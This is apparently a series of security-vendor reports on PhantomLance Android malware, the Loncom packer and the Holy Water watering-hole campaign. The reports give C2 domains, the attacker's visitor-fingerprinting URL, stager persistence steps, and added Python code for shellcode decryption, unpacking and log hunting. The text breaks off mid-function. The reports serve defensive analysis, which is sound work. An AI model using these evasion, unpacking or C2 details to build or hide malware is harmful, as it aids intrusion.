In nearly every case of malware deployment, the threat actors try to build a fake developer profile by creating a GitHub account that contains only a fake end-user license agreement (EULA). An example is the one below, which we reported to Google.

This Google Play page contains a fake developer email

Here is a related GitHub account with the same handle, registered on October 17, 2019.

A GitHub profile that is part of the fake developer identity

The account contains only one repository with one file, described as some type of EULA.

During our extensive investigation, we spotted a tactic often used by the threat actors for distributing their malware. The initial versions of applications uploaded to app marketplaces did not contain any malicious payloads or code for dropping a payload. These versions were accepted because they contained nothing suspicious; follow-up versions were then updated with both malicious payloads and the code to drop and execute them. We were able to confirm this behavior in all of the samples, finding two versions of the applications, with and without a payload.

An example of this behavior can be seen in Ads Skipper (https://apkpure[.]ai/ads-skipper), in ApkPure.

Versions of Ads Skipper with (v. 2.0) and without (v. 1.0) a malicious payload in ApkPure

Third-party marketplaces like those mentioned in the table above often serve as a mirror for Google Play: they simply copy applications and metadata from Google Play to their own servers. Therefore, it is safe to assume that the samples listed in the table were copied from Google Play as well.

Infrastructure

While analyzing the C2 server infrastructure, we quickly identified multiple domains that shared similarities with previous ones but were not linked to any known malware samples. This allowed us to uncover more pieces of the attackers’ infrastructure.

Example of related infrastructure

Tracking PhantomLance’s old infrastructure, which dated back four years, we noticed that the expired domain names had been extended. The maintenance suggested that the infrastructure might be used again in the future.

Domain | Registered | Last updated
osloger[.]biz | 2015-12-09 | 2019-12-01
log4jv[.]info | 2015-12-09 | 2019-11-26
sqllitlever[.]info | 2015-12-09 | 2019-11-26
anofrio[.]com | 2017-05-16 | 2020-03-30
anaehler[.]com | 2017-05-16 | 2020-03-30
viodger[.]com | 2017-05-16 | 2020-04-07

The PhantomLance TTPs indicate that samples are configured only with subdomains as C2 servers, while most, but not all, parent domains do not have their own IP resolution. We checked the ones that did have a valid resolution and found that they all resolved to the same IP address: 188.166.203[.]57. It belongs to the DigitalOcean cloud infrastructure provider and, according to Domaintools, hosts a total of 129 websites.

Looking up records for this IP address in our passive DNS database suggests that a few dozen of these websites are legitimate, as well as the aforementioned PhantomLance domains and two more interesting overlaps with OceanLotus infrastructure:

  • browsersyn[.]com: known domain used as a C2 in a previously publicly reported sample (MD5: b1990e19efaf88206f7bffe9df0d9419) considered by the industry to be the OceanLotus APT.
  • cerisecaird[.]com: privately received information indicates that this domain is related to OceanLotus as well.

Victimology

We have observed around 300 attempted infections of Android devices in India, Vietnam, Bangladesh, Indonesia, etc. starting in 2016. Below is a rough cartographic representation of the countries with the most attempted attacks.

We have also seen a number of detections in Nepal, Myanmar and Malaysia. As you can see, this part of South Asia seems to be targeted by the actors the most.

Note that due to the chosen distribution vector (publication of malicious samples on publicly available application stores), there are bound to be incidental infections of random victims not directly related to the actors’ interests.

To get more details on targeted victims, we looked at the types of applications that the malware mimicked. Apart from common luring applications, such as Flash plugins, cleaners and updaters, there were those that specifically targeted Vietnam.

  • luxury.BeerAddress – “Tim quan nhau | Tìm quán nhậu” (“Find each other | Find pubs” in Vietnamese). An application for finding the nearest pub in Vietnam.
  • codedexon.churchaddress – “Địa Điểm Nhà Thờ” (“Church Place”)

    Publisher description (hxxps://apk.support/app-en/com.codedexon.churchaddress) translated from Vietnamese:
    Information about churches near you or the whole of Vietnam, information about patronies, priests, phone numbers, websites, email, activities, holidays…

  • bulknewsexpress.news – “Tin 247 – Đọc Báo Hàng Ngày” (“Read Daily Newspaper”)

    Mimics the Vietnamese www.tin247.com mobile news application.

Overlaps with previous campaigns

In this section, we provide a correlation of PhantomLance’s activity with previously reported campaigns related to the OceanLotus APT.

OceanLotus Android campaign in 2014-2017

In May 2019, Antiy Labs published a report in which they described an Android malware campaign, claiming that it was related to OceanLotus APT. We checked the provided indicators using information from our telemetry and found that the very first tracks of these samples date back to December 2014.

It is important to note that according to our detection statistics, the majority of users affected by this campaign were located in Vietnam, with the exception of a small number of individuals located in China.

The main infection vector seems to be links to malicious applications hosted on third-party websites, possibly distributed via SMS or email spearphishing attacks. Examples below.

Referring URL for victim | Malware URL | First request | Last request
hxxp://download.com[.]vn/android/download/nhaccuatui-downloader/31798 | hxxp://113.171.224.175/videoplayer/NhacCuaTuiDownloader[.]apk | 2015-03-03 | 2015-03-22
 | hxxp://nhaccuatui.android.zyngacdn.com/NhacCuaTuiDownloader[.]apk | 2014-12-29 | 2015-03-19
hxxp://www.mediafire.com/file/1elber8zl34tag4/framaroot-xpro[.]apk | hxxp://download1825.mediafire.com/tyxddh46orzg/1elber8zl34tag4/framaroot-xpro[.]apk | 2015-04-07 | 2017-01-04

 

The latest registered malware download event occurred in December 2017. We observed a small amount of activity in 2018, but judging by the volume of hosted malware and the number of detections we observed, the main campaign took place from late 2014 to 2017.

To best visualize the similarities we discovered, we made a code structure comparison of the sample from the old reported OceanLotus Android campaign (MD5: 0e7c2adda3bc65242a365ef72b91f3a8) and the only unobfuscated (probably a developer version) PhantomLance payload v3 (MD5: 243e2c6433815f2ecc204ada4821e7d6).

Code structure comparison of a sample linked to OceanLotus and PhantomLance payload v3.

Despite the multiple differences, we observed a similar pattern used in malware implementation. It seems that the developers have renamed “module” to “plugin”, but the meaning remains the same. Overlapping classes look quite similar and have the same functionality. For example, here is a comparison of the methods contained in the Parser classes.

Parser from 0e7c2adda3bc65242a365ef72b91f3a8 | ParserWriter/Reader from 243e2c6433815f2ecc204ada4821e7d6
public void appendBoolean(boolean f) | public void appendBoolean(boolean value)
public void appendByte(byte data) | public void appendByte(byte value)
public void appendBytes(byte[] data) | public void appendBytes(byte[] value)
public void appendDouble(double val) | public void appendDouble(double value)
public void appendInt(int val) | public void appendInt(int value)
public void appendLong(long val) | public void appendLong(long value)
 | private void appendNumber(Object value)
public void appendShort(short val) | public void appendShort(short value)
public void appendString(String str) | public void appendString(String value)
public byte[] getContents() | public byte[] getContents()
public void appendFloat(float val) | 
public boolean getBoolean() | public boolean getBoolean()
public byte getByte() | public byte getByte()
public byte[] getBytes() | public byte[] getBytes()
public double getDouble() | public double getDouble()
public float getFloat() | 
public int getInt() | public int getInt()
public long getLong() | public long getLong()
public short getShort() | public short getShort()
byte getSignal()
public String getString() | public String getString()
getStringOfNumber()

Using our malware attribution technology, we can see that the PhantomLance payloads are at least 20% similar to the ones from the old OceanLotus Android campaign.

OceanLotus macOS backdoors

There are multiple public reports of macOS backdoors linked by the industry to OceanLotus. We examined these in order to find possible overlaps, with the caveat that comparing malware implemented for two completely different platforms, in two different programming languages, is inherently difficult. However, during the analysis of the macOS payload (MD5: 306d3ed0a7c899b5ef9d0e3c91f05193) dated early 2018, we were able to catch a few minor traces of the code pattern used in the Android malware implementation described above. In particular, three out of seven main classes had the same names and similar functionality: “Converter”, “Packet” and “Parser”.

Summary of overlaps

Another notable attribution token that applies to most of OceanLotus malware across platforms is usage of three redundant, different C2 servers by each sample, mostly subdomains. Below is an example of this from the samples examined above and OceanLotus Windows malware described in our private report.

MD5 | C2 servers | Description
0d5c03da348dce513bf575545493f3e3 | mine.remaariegarcia[.]com, egg.stralisemariegar[.]com, api.anaehler[.]com | PhantomLance Android
d1eb52ef6c2445c848157beaba54044f | sadma.knrowz[.]com, ckoen.dmkatti[.]com, itpk.mostmkru[.]com | OceanLotus Android campaign 2014-2017
306d3ed0a7c899b5ef9d0e3c91f05193 | ssl.arkouthrie[.]com, s3.hiahornber[.]com, widget.shoreoa[.]com | OceanLotus MacOS backdoor
51f9a7d4263b3a565dec7083ca00340f | ps.andreagahuvrauvin[.]com, paste.christienollmache[.]xyz, att.illagedrivestralia[.]xyz | OceanLotus Windows backdoor

Based on the complete analysis of previous campaigns, the actors’ interest in victims located in Vietnam, the infrastructure overlaps between PhantomLance and OceanLotus for Windows, and the multiple code similarities with an old Android campaign and with the macOS backdoors, we attribute the set of Android activity (the 2014-2017 campaign and PhantomLance) to OceanLotus with medium confidence.

Considering the timeline of the Android campaigns, we believe that the activity reported by Antiy Labs is a previous campaign that was conducted by OceanLotus until 2017, and PhantomLance is a successor, active since 2016.

In summarizing the results of this research, we are able to assess the scope and evolution of the actors’ Android activity, which has been operating for almost six years.

IOC

Kaspersky Lab product verdicts

PhantomLance

HEUR:Backdoor.AndroidOS.PhantomLance.*
HEUR:Trojan-Dropper.AndroidOS.Dnolder.*

Android campaign linked to OceanLotus (2014-2017)

HEUR:Trojan.AndroidOS.Agent.eu
HEUR:Trojan.AndroidOS.Agent.vg
HEUR:Trojan-Downloader.AndroidOS.Agent.gv

macOS campaign linked to OceanLotus

HEUR:Backdoor.OSX.OceanLotus.*

MD5

PhantomLance malware


PhantomLance payload-free versions


Android campaign 2014-2017


Domains and IP addresses

PhantomLance


Android campaign 2014-2017


Loncom packer: from backdoors to Cobalt Strike

The previous story described an unusual way of distributing malware under the guise of an update for an expired security certificate. After the story went out, we conducted a detailed analysis of the samples we had obtained, with some interesting findings. All of the malware we examined from the campaign was packed with the same packer, which we named Trojan-Dropper.NSIS.Loncom. The packer uses legitimate NSIS software for packing and loading shellcode, and the Microsoft Crypto API for decrypting the final payload. Like the earlier find, this one was not without its surprises, as one of the packaged samples contained software used by APT groups.

Primary analysis

Loncom utilizes NSIS for running shellcode contained in a file with a name that consists of numbers. In our example, the file is named 485101134:

Overview of the NSIS archive contents

Once the shellcode is unpacked to the hard disk and loaded into the memory, an NSIS script calculates the starting position and proceeds to the next stage.

What the shellcode does

Before proceeding to decrypt the payload, the shellcode starts decrypting itself piece by piece, using the following algorithm:

  • Find position for next 0xDEADBEEF dword.
  • Read dword: size of data to decrypt.
  • Read dword: first part of key.
  • Read dword: second part of key.
  • Find a suitable key: check candidate numbers sequentially, starting at 0, while xor(i, second part of key) != first part of key. This loop only serves to hold up execution and hinder AV detection; it simplifies to key = i = xor(first part, second part).
  • Decrypt next part of shellcode (xor), move on to it.

Decrypting the next part of the shellcode

Here’s the code that performs the algorithm described above:

After several such iterations of block decryption, the shellcode switches to active steps: loading libraries and retrieving the addresses of required functions with the help of the API hashing technique. This avoids stating the names of the requested functions directly, providing their hashes instead. When searching for a function by hash, a hash is calculated for each entry in the library’s export table until it matches the target.

Then, Loncom decrypts the payload contained in the same file as the shellcode and proceeds to run it. The payload is encrypted with an AES-256 block cipher. The decryption key is stated in the code, and the payload offset and size are passed from the NSIS script.

The main part of the shellcode: decrypting the payload

Unpacking

For automated Loncom unpacking, we need to find out how data is stored in the packed NSIS installers, obtain the payload offset and size from the NSIS script, and pull the key from the shellcode.

Unpacking the NSIS

After a brief analysis, we managed to find that the NSIS installers have the following structure:

  • an MZPE NSIS interpreter containing in its overlay the data to be processed: the flag, the signatures, the size of the unpacked header, and the total size of the data, and then the containers, i.e. the compressed data itself.
  • Containers in the following format: dword (data size):zlib_deflate(data). The 0th container has the header, the first container has our file with the shellcode and the payload, and the second one has the DLL with the NSIS plugin.
  • The header contains a table of operation codes for the NSIS interpreter, a string table and a language table.

As we have obtained the encrypted file, now all we need is to find the payload offset and size, and proceed to decrypting the payload and the shellcode.

NSIS data structure

As all arguments in the NSIS operation codes when using plugins are passed as strings, we need to retrieve from the header string table all strings that look like numbers within the logical limits: from 0 to (file size – shellcode size).
NSIS unpacking code:
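The container walk and the numeric-string filter described above, as an added Python illustration (not the article's own unpacking code, which the original shows as an image). The back-to-back record layout, the raw-deflate assumption, the whole-header scan in candidate_offsets and the sample header strings are all constructed for this demonstration.

```python
import re
import struct
import zlib


def inflate(body):
    """Inflate one container body. Raw deflate is tried first; a zlib-wrapped
    stream is accepted as a fallback. Which form a given sample uses is not
    stated in the article, hence the fallback."""
    try:
        return zlib.decompress(body, -15)
    except zlib.error:
        return zlib.decompress(body)


def split_containers(data):
    """Walk back-to-back 'dword size : deflate(data)' records and return the
    inflated bodies in order (0: header, 1: shellcode+payload file, 2: plugin
    DLL). `data` must start at the first container, i.e. past the flag,
    signature and size fields of the overlay."""
    bodies, pos = [], 0
    while pos + 4 <= len(data):
        (size,) = struct.unpack_from("<I", data, pos)
        body = data[pos + 4:pos + 4 + size]
        if len(body) != size:
            raise ValueError("truncated container at offset %d" % pos)
        bodies.append(inflate(body))
        pos += 4 + size
    return bodies


# NUL-terminated runs of decimal digits that are not glued to other digits.
NUMERIC_STRING = re.compile(rb"(?<![0-9])([0-9]{1,10})\x00")


def candidate_offsets(header, upper_bound):
    """Numbers that could be the payload offset or size: numeric strings from
    the header within 0..upper_bound (file size minus shellcode size).
    Scanning the whole header instead of parsing the string table proper is a
    simplification made for this example."""
    found = {int(m.group(1)) for m in NUMERIC_STRING.finditer(header)}
    return sorted(n for n in found if n <= upper_bound)


def deflate_record(raw):
    """Build one container record (raw deflate) for the constructed sample."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    packed = comp.compress(raw) + comp.flush()
    return struct.pack("<I", len(packed)) + packed


def build_sample():
    """Constructed overlay (not a real Loncom installer): a header whose strings
    include the numeric shellcode file name, two plausible offset/size
    arguments and an out-of-range number, a stand-in for the shellcode+payload
    file, and a stand-in plugin DLL."""
    header = b"\x00".join([b"$INSTDIR\\485101134", b"4096", b"12345678",
                           b"99999999999", b"System.dll"]) + b"\x00"
    shellcode_file = b"\xEE" * 4096 + b"<shellcode stand-in>"
    plugin = b"MZ<plugin stand-in>"
    overlay = (deflate_record(header) + deflate_record(shellcode_file)
               + deflate_record(plugin))
    return overlay, [header, shellcode_file, plugin]


if __name__ == "__main__":
    overlay, _ = build_sample()
    header, shellcode_file, _plugin = split_containers(overlay)
    # Only 4096 survives the bound: the file name 485101134 and 12345678 are
    # larger than the file itself and can be discarded before brute-forcing.
    print(candidate_offsets(header, len(shellcode_file)))
```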

To simplify determining the payload offset and size, we can recall the structure of the file containing the shellcode: the encrypted blocks are decrypted from the smallest address to the largest, top to bottom, and the payload is located above the shellcode. Thus, we can locate the first 0xDEADBEEF dword and treat its position as the end of the encrypted data (aligning as required, because AES is a block cipher).
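The block-decryption loop from “What the shellcode does” together with the payload-end rule just described, as an added Python example rather than the article's IDA script. Clear-text block headers laid out back to back, dword-wise XOR and the sample image are assumptions constructed for this demonstration; the article only says the blocks are “xor” decrypted.

```python
import struct

MARKER = struct.pack("<I", 0xDEADBEEF)  # delimiter the shellcode searches for
HDR = struct.Struct("<III")             # dwords after the marker: size, key part 1, key part 2
AES_BLOCK = 16


def key_search(part1, part2, limit=1 << 24):
    """The loop as the shellcode runs it: count i up from 0 until
    (i XOR part2) == part1. Bounded here so a malformed header cannot hang
    an unpacker."""
    for i in range(limit):
        if (i ^ part2) == part1:
            return i
    raise ValueError("key not found within search limit")


def key_direct(part1, part2):
    """Closed form of the loop above: the only i with i ^ part2 == part1 is
    part1 ^ part2, so the search is pure delay."""
    return part1 ^ part2


def xor_dwords(data, key):
    """XOR each little-endian dword of `data` with `key`. Symmetric, so it both
    encrypts and decrypts. Dword granularity is an assumption (see lead-in)."""
    out = bytearray(data)
    for off in range(0, len(out) - 3, 4):
        (v,) = struct.unpack_from("<I", out, off)
        struct.pack_into("<I", out, off, v ^ key)
    return bytes(out)


def decrypt_chain(blob, start):
    """Follow the marker chain from `start`: marker, header, `size` encrypted
    bytes, then the next marker. Returns the decrypted blocks in order.
    Assumed layout for this demo: headers in the clear, blocks back to back."""
    blocks = []
    pos = blob.find(MARKER, start)
    while pos != -1:
        size, part1, part2 = HDR.unpack_from(blob, pos + len(MARKER))
        body_off = pos + len(MARKER) + HDR.size
        body = blob[body_off:body_off + size]
        if len(body) != size:
            raise ValueError("truncated block at offset %d" % pos)
        blocks.append(xor_dwords(body, key_direct(part1, part2)))
        pos = blob.find(MARKER, body_off + size)
    return blocks


def payload_end(blob):
    """Offset of the first marker rounded down to the AES block size. The
    encrypted payload sits above the shellcode, so its ciphertext ends here."""
    pos = blob.find(MARKER)
    if pos == -1:
        raise ValueError("no 0xDEADBEEF marker in image")
    return pos - pos % AES_BLOCK


def build_sample():
    """Constructed image (not a real Loncom file): 48 bytes standing in for the
    AES ciphertext, then two XOR-encrypted blocks with distinct key pairs.
    Returns (image, plaintext blocks, stand-in payload length)."""
    fake_payload = bytes(range(48))
    plain = [b"block-one-code!!", b"block-two-code-here!"]   # 16 and 20 bytes
    parts = [(0x11223344, 0x55667788), (0xA0A0A0A0, 0x0F0F0F0F)]
    img = fake_payload
    for text, (p1, p2) in zip(plain, parts):
        img += MARKER + HDR.pack(len(text), p1, p2) + xor_dwords(text, p1 ^ p2)
    return img, plain, len(fake_payload)


if __name__ == "__main__":
    image, expected, payload_len = build_sample()
    print("encrypted payload ends at offset", payload_end(image))
    for i, block in enumerate(decrypt_chain(image, payload_len)):
        print("block", i, block)
```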

Decrypting the shellcode

To decrypt the payload, we need to:

  • decrypt the shellcode blocks;
  • determine where the AES key is;
  • retrieve the key;
  • try to decrypt the payload for offsets received from the NSIS;
  • stop after obtaining the first two bytes = ‘MZ’.

Step one can be performed by slightly modifying the code that performs the decryption algorithm in IDA Pro. The key can be located with the help of a simple regular expression, ‘\xC7\x45.(....)\xC7\x45.(....)\xC7\x45.(....)\xC7\x45.(....)\xE8’: “mov dword ptr” four times, then “call” (see the pseudocode of the main part of the shellcode).
The other steps do not require a detailed explanation. We will now describe the actual malware that was packed with Loncom.

What’s inside

Besides Mokes and Buerak, which we mentioned in the previous article, we noticed packed specimens of the Backdoor.Win32.DarkVNC and Trojan-Ransom.Win32.Sodin families, the latter also known as REvil and Sodinokibi. The first is a backdoor used for controlling an infected machine via the VNC protocol. The second is ransomware that encrypts the victim’s information and threatens to publish it.
However, the most exciting find was the Cobalt Strike utility, used both by legitimate pentesters and by various APT groups. The command center of the sample that contained Cobalt Strike had previously been seen distributing CactusTorch, a utility for running shellcode present in Cobalt Strike modules, and the same Cobalt Strike packed with a different packer.

We continue monitoring Trojan-Dropper.NSIS.Loncom and hope to share new findings soon.

IOC

BB00BA9726F922E07CF243D3CCFC2B6E (Backdoor.Win32.DarkVNC)
EBE191BF77044961684DF51B88CA8D05 (Backdoor.Win32.DarkVNC)
4B4C98AC8F04680F7C529956CFE8519B (Trojan-Ransom.Win32.Sodin)
AEF8FBB5C64734093E78EB13E6FA7849 (Cobalt Strike)



Holy water: ongoing targeted water-holing attack in Asia

On December 4, 2019, we discovered watering hole websites that were compromised to selectively trigger a drive-by download attack with fake Adobe Flash update warnings. This campaign has been active since at least May 2019, and targets an Asian religious and ethnic group.

The threat actor’s unsophisticated but creative toolset has been evolving a lot since the inception date, may still be in development, and leverages Sojson obfuscation, NSIS installer, Python, open-source code, GitHub distribution, Go language, as well as Google Drive-based C2 channels.

The threat actor’s operational target is not clear because, unfortunately, we haven’t been able to observe many live operations, and we couldn’t identify any overlap with known intrusion sets.

Thou shalt update plugins: attack synopsis

The watering holes have been set up on websites that belong to personalities, public bodies, charities and organizations of the targeted group. At the time of writing, some of these websites (all hosted on the same server) are still compromised, and continue to direct selected visitors to malicious payloads:

Domain | Description
*****corps.org | Voluntary service program
*****ct.org | Religious personality’s charity
*****policy.net | Policy institute
*****che.com | Religious personality
*****parliament.org | Public body
*****ialwork.org | Charity
*****nature.net | Environmental conservation network
*****airtrade.com | Fair trade organization

Upon visiting one of the watering hole websites, a previously compromised but legitimately embedded resource will load a malicious JavaScript. It’s hosted by one of the water-holed websites, and gathers information on the visitor. An external server (see Fig. 1) then ascertains whether the visitor is a target.

Fig. 1. Target validation service request.

If the visitor is validated as a target, the first JavaScript stage will load a second one, which in turn will trigger the drive-by download attack, showing a fake update pop-up (see Fig. 2).

Fig. 2. Warning generated by the second payload.

The visitor is then expected to fall into the update trap, and download a malicious installer package that will set up a backdoor.

For nothing is hidden that will not come to light: technical analysis

1st JavaScript stage

The first JavaScript stage is named (script|jquery)-css.js, and is obfuscated with the Chinese-language web service Sojson, version 4 (see Fig. 3).

Fig. 3. Sojson v4 JavaScript obfuscated one-liner.

The payload leverages the RTCPeerConnection API and ipify service to fingerprint visitors. The gathered data is sent to loginwebmailnic.dynssl[.]com through HTTP GET requests, in order to validate the visitor as a target:

https://loginwebmailnic.dynssl[.]com/all/content.php?jsoncallback=&lanip=&wanip=&urlpath=&_=

The JSON-formatted response, whose only key is “result”, can either be “t” or “f” (true or false). If the value is “f”, then nothing happens, while “t” will trigger the second JavaScript stage (see Fig. 4).

Fig. 4. First stage deobfuscated validation logic.

In a previous version of this first-stage script, an additional JavaScript payload was unconditionally loaded during the first stage, and proceeded with another branch of visitor validation and the second stage.

This other branch loaded scripts from root20system20macosxdriver.serveusers[.]com, and leveraged https://loginwebmailnic.dynssl[.]com/part/mac/contentmc.php URL to validate targets. The host and validation page names suggest this other branch may have been specifically targeting MacOS users, but we were unable to confirm this hypothesis.

2nd JavaScript stage

The second JavaScript stage is named (script|jquery)-file.js, and is obfuscated with Sojson version 5 (see Fig. 5).

Fig. 5. Nerve-breaking one-line obfuscation.

The payload leverages jquery.fileDownload to show a modal pop-up to the target. It offers visitors an update to Flash Player. No technical vulnerabilities are exploited: the threat actor relies on the target’s willingness to keep their system up to date. The deobfuscated JavaScript payload (see Fig. 6) reveals that the malicious update is hosted on GitHub.

Fig. 6. Malicious update source in second JavaScript payload.

GitHub FlashUpdate repository

The pop-up links to a PE executable hosted on github[.]com/AdobeFlash32/FlashUpdate. GitHub disabled this repository on February 14 after we reported it to them. However, the repository has been online for more than nine months, and thanks to GitHub’s commit history (see Fig. 7), we gained a unique insight into the attacker’s activity and tools.

Fig. 7. GitHub’s AdobeFlash32 commit history.

Four executables were hosted in AdobeFlash32/FlashUpdate on the last day it was still available:

  • An installer package, embedding a decoy legitimate Flash update and a stager.
  • Godlike12, a Go backdoor that implements a Google Drive based C2 channel.
  • Two versions of the open-source Stitch Python backdoor that the threat actor modified to add functionalities (persistence, auto-update, decoy download and execution).

Digging into the repository for older commits, we also discovered a previous fake update toolset: a C installer bundling the legitimate Flash installer and a vanilla Stitch backdoor, as well as a C++ infostealer that collects information about host computers (OS version, IP address, hostname) and sends them over HTTP/S.

Installer package

MD5 9A819F2CE060058745FF5374221ADA7C
Compilation date 2017-Jul-24 06:35:22
File type PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
File size 4420 KB
File names flashplayer32ppi_xa_install.exe

This malicious update package is a NSIS installer version 3 that will drop and execute two other binaries:

  • FlashUpdate.exe, D59B35489CB88619415D175953CA5400, a legitimate Windows Flash Player installer from January 15 that is used as a decoy to trick the user into believing they actually set up a Flash update. As modern Adobe Flash installers ‘phone home’ to check for their own validity, this one will fail nowadays with a message stating that the installer is outdated or renamed, and will direct the user to the Adobe website.
  • Intelsyc.exe, the malicious payload (described below).

The installer is detected by Kaspersky endpoint protection heuristics as HEUR:Trojan.Win32.Tasker.gen.

Intelsyc Go stager

MD5 6DC5F8282DF76F4045F75FEA3277DF41
Compilation date 1970-Jan-01 00:00:00
File type PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
File size 5976 KB
File names flashplayer32ppi_xa_install.exe
C2 server adobeflash31_install.ddns[.]info
User Agent Go-http-client/1.1

The Go-programmed Intelsyc implant is aimed at staging itself, downloading the Godlike12 backdoor (described below), and setting up persistence.

It will first retrieve /flash/sys.txt with HTTP GET on adobeflash31_install.ddns[.]info. The file contents may be used as a killswitch to stop any further deployment. If the content is “1” though, the implant will:

  • copy itself to C:/ProgramData/Intel/Intelsyc.exe;
  • establish persistence through schtasks [T1053] with a logon task named Intelsyc, run as system, and pointing to a previously created self copy;
  • download Godlike12 from github[.]com/AdobeFlash32/FlashUpdate, as C:\ProgramData\Adobe\flashdriver.exe;
  • establish Godlike12 persistence through a registry run key [T1060] named flashdriver in HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, and pointing to a previously downloaded backdoor.

The stager is detected by Kaspersky endpoint protection heuristics as UDS:DangerousObject.Multi.Generic, and may be misidentified as the GoRansom Go ransomware proof of concept by other endpoint protection products.

Source file paths in the code suggest this backdoor may have been developed on a Windows system.
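The first JavaScript stage (validator request to loginwebmailnic.dynssl[.]com) and the Intelsyc stager steps above leave a recognisable trail in proxy, scheduled-task and registry telemetry. The following is an added hunting example, not code from the report: it matches constructed log lines (the format, the schtasks switches and the registry event wording are illustrative assumptions) against the indicators the report prints, refanged, and flags hosts that hit more than one stage of the chain.

```python
"""Hunting for the fake-update chain in proxy, scheduled-task and registry
logs. Added example, not the report's code. Log lines are constructed to
resemble the telemetry a defender would have; indicators are the report's."""
import re

# Indicators from the report (printed there with "[.]"; refanged here).
VALIDATOR_URL_RE = re.compile(
    r"loginwebmailnic\.dynssl\.com/\S*content\w*\.php\?jsoncallback=")
KILLSWITCH_URL = "adobeflash31_install.ddns.info/flash/sys.txt"
GO_USER_AGENT = "Go-http-client/1.1"
RUN_KEY = r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"

# Each rule: (name, predicate over one log line).
RULES = [
    # 1st JavaScript stage asking the validator whether the visitor is a target
    ("holywater.validator_request",
     lambda l: VALIDATOR_URL_RE.search(l) is not None),
    # Intelsyc polling /flash/sys.txt with Go's default User-Agent
    ("intelsyc.killswitch_poll",
     lambda l: KILLSWITCH_URL in l and GO_USER_AGENT in l),
    # schtasks logon task named Intelsyc pointing at the self-copy
    ("intelsyc.logon_task",
     lambda l: "schtasks" in l.lower()
     and re.search(r"/tn\s+Intelsyc\b", l, re.IGNORECASE) is not None
     and "intelsyc.exe" in l.lower()),
    # Run-key value "flashdriver" set under HKLM\...\Run
    ("godlike12.run_key",
     lambda l: RUN_KEY.lower() in l.lower() and "flashdriver" in l.lower()),
]

# Constructed telemetry: "<source> <timestamp> <host> <event ...>".
# The schtasks switches and registry event wording are illustrative.
SAMPLE_LOGS = [
    'proxy 2020-02-10T09:12:01Z 10.0.0.5 GET https://loginwebmailnic.dynssl.com/all/content.php?jsoncallback=cb&lanip=10.0.0.5&wanip=203.0.113.7&urlpath=/ "Mozilla/5.0"',
    'proxy 2020-02-10T09:15:44Z 10.0.0.5 GET http://adobeflash31_install.ddns.info/flash/sys.txt "Go-http-client/1.1"',
    'task 2020-02-10T09:15:45Z 10.0.0.5 schtasks /create /tn Intelsyc /sc onlogon /ru SYSTEM /tr C:/ProgramData/Intel/Intelsyc.exe',
    'reg 2020-02-10T09:16:10Z 10.0.0.5 SetValue HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\flashdriver C:\\ProgramData\\Adobe\\flashdriver.exe',
    'proxy 2020-02-10T09:20:00Z 10.0.0.6 GET https://www.example.com/ "Mozilla/5.0"',
]


def scan(lines):
    """Map each host to the set of rule names its log lines matched."""
    hits = {}
    for line in lines:
        fields = line.split()
        if len(fields) < 4:
            continue
        host = fields[2]
        for name, pred in RULES:
            if pred(line):
                hits.setdefault(host, set()).add(name)
    return hits


def confirmed_hosts(hits, minimum=2):
    """Hosts matching at least `minimum` distinct stages of the chain.
    A lone validator request only means the visitor was profiled; the
    stager and persistence rules show the update trap was actually taken."""
    return sorted(h for h, names in hits.items() if len(names) >= minimum)


if __name__ == "__main__":
    found = scan(SAMPLE_LOGS)
    for host, names in found.items():
        print(host, sorted(names))
    print("confirmed:", confirmed_hosts(found))
```

The validator rule alone is worth a lower-severity alert on its own, since the report notes that the fingerprinting request is sent to every visitor of a water-holed site, not only to those later served the fake update.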

Godlike12 Go backdoor

MD5 BEC4482890A89F0184B463C727709D53
Compilation date 1970-Jan-01 00:00:00
File type PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
File size 4436 KB
File names flashdriver.exe
C2 server Google Drive

This implant is written in Go, and its C2 channel relies on file exchanges with a Google Drive space, through Google Drive’s HTTPS API v3. The implant probably leverages the gdrive Go source from GitHub, as it shares several identical source code paths with it.

Godlike12 is the name the threat actor gave to the Google Drive space connections from this implant. Source file paths in the code suggest this backdoor may have been developed on a GNU/Linux system. The not-so-common (less than 100 results in a popular search engine) /root/gowork GOPATH that some of this backdoor’s modules have been compiled from seems popular in Chinese-speaking communities, and may originate from a Chinese-authored tutorial on Go language.

Godlike12 first proceeds with host fingerprinting upon startup (hostname, IP address, MAC address, Windows version, current time). The result is encrypted, base64-encoded, stored in a text file at %TEMP%/[ID]-lk.txt, and uploaded to the remote Google Drive. The implant then regularly checks for a remote [ID]-cs.txt, that contains encrypted commands to execute, and stores encrypted command results in %TEMP%/[ID]-rf.txt to later upload them to the same Google Drive space. ID is the MD5 hash of the base64-encoded MAC address of the first connected network adapter, while TripleDES in ECB mode is used as an encryption algorithm. It is worth mentioning that once again, the encryption function seems to have been inspired by existing open-source code, which mainly appears popular in Chinese-language forums.

Godlike12 does not implement a persistence mechanism, as it is provided by the previous installer package. It is detected by Kaspersky endpoint protection heuristics as HEUR:Trojan.Win32.Generic.

With this implant being a month old at the time of writing (while being in use since at least October 2019), and other malicious update implants having been used before, it is possible that Godlike12-based operations were still a work in progress when we investigated them.
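The working-file naming scheme above gives responders a host-side artefact to hunt for even though the C2 traffic itself is ordinary Google Drive HTTPS. The following is an added example, not the report's or the implant's code: it scans a %TEMP% listing for the [ID]-lk/cs/rf.txt pattern and checks whether an ID can be derived from the host's first-adapter MAC. The report says ID = MD5(base64(MAC)) but not how the MAC is serialised before base64, so several encodings are tried; that, the sample MAC and the listing are all constructed assumptions. No decryption is attempted, as the TripleDES key is not given on the page.

```python
"""Hunting for Godlike12's working files in a %TEMP% listing.
Added example (not the report's code). The MAC serialisations are an
assumption; the sample MAC and directory listing are constructed."""
import base64
import hashlib
import re

ARTIFACT_RE = re.compile(r"^(?P<id>[0-9a-fA-F]{32})-(?P<kind>lk|cs|rf)\.txt$")
KIND_MEANING = {
    "lk": "host fingerprint, uploaded to Google Drive",
    "cs": "encrypted command file, downloaded from Google Drive",
    "rf": "encrypted command results, uploaded to Google Drive",
}


def mac_forms(mac):
    """Plausible serialisations of a MAC address (assumption: the implant
    base64-encodes one of these before hashing)."""
    hexd = re.sub(r"[^0-9a-fA-F]", "", mac)
    if len(hexd) != 12:
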